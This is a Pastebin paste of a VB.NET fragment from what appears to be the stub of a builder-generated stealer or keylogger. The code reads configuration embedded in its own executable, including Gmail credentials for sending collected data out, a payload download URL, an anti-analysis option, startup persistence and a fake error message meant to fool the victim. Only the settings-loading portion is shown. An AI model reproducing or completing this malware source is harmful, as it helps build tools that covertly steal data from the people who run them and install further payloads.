Advertisement
Guest User

Untitled

a guest
Jun 23rd, 2017
61
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Try
  2.  
  3.             FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read)
  4.  
  5.  
  6.             gmailusr = Space(LOF(1)) '1
  7.            gmailpwd = Space(LOF(1)) '2
  8.            tmrinterval = Space(LOF(1)) '3
  9.            exename = Space(LOF(1)) '4
  10.            downloadenabled = Space(LOF(1)) '5
  11.            downloadurl = Space(LOF(1)) '6
  12.            enablelink = Space(LOF(1)) '7
  13.            anties = Space(LOF(1)) '8
  14.            startup = Space(LOF(1)) '9
  15.            cb6 = Space(LOF(1)) '10
  16.            cb7 = Space(LOF(1)) '11
  17.            cb8 = Space(LOF(1)) '12
  18.            cb9 = Space(LOF(1)) '13
  19.            errortitle = Space(LOF(1)) '14
  20.            errormessage = Space(LOF(1)) '15
  21.  
  22.  
  23.  
  24.             Settings = Split(System.Text.Encoding.Default.GetString(ReadResource(Application.ExecutablePath)), Fitz)
  25.             'This splits every string that has been passed from the builder using our "Const".
  26.            'settings(0) = stub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement